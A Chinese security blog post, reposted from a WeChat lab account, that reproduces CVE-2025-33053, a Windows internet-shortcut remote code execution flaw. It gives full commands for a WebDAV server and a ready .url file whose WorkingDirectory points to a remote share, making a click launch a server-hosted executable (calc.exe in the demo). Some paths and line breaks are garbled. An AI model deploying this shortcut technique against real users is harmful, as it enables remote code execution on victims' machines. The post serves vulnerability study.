CVE-2025-33053 网络快捷方式文件远程代码执行漏洞
背景
微软6月修复了一个网络快捷方式的漏洞,由checkpoint捕获的APT组织Stealth Falcon样本中发现的。
复现
设置.url文件的WorkingDirectory为远程恶意服务器的webdav文件夹, 在打开时会调用iediagcmd.exe, 进而调用同目录下的route.exe, 因为工作文件夹设置成了恶意服务器上的路径, 就会启动恶意服务器的route.exe, 具体复现如下:
创建webdav服务器
安装:
sudo apt update && sudo apt upgrade -ysudo apt install apache2 apache2-utils -ysudo a2enmod davsudo a2enmod dav_fssudo systemctl restart apache2sudomkdir -p /var/www/webdavsudochown www-data:www-data /var/www/webdavsudochmod 755 /var/www/webdavsudo vim /etc/apache2/sites-available/webdav.conf配置文件:
<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/webdav <Directory /var/www/webdav> Options Indexes FollowSymLinks AllowOverride None DAV On Require all granted </Directory> ErrorLog ${APACHE_LOG_DIR}/webdav_error.log CustomLog ${APACHE_LOG_DIR}/webdav_access.log combined</VirtualHost>重启:
sudo a2ensite webdav.confsudo a2dissite 000-default.confsudo systemctl reload apache2从本地计算机复制一份iediagcmd.exe到webdav文件夹, 然后把calc.exe复制到webdav文件夹里。
制作URL文件
新建一个txt,写入以下内容,WorkingDirectory设置为远程服务器的路径:
[InternetShortcut]URL=C:Program FilesInternet Exploreriediagcmd.exeWorkingDirectory=\192.168.146.138@80/DavWWWRootShowCommand=7IconIndex=70IconFile=C:WindowsSystem32SHELL32.dll可以通过IconFile和IconIndex来设置url文件的图标
最终效果
参考
-
• CheckPoint的文章(https://research.checkpoint.com/2025/stealth-falcon-zero-day/)
原文始发于微信公众号(BeFun安全实验室):CVE-2025-33053 网络快捷方式文件远程代码执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论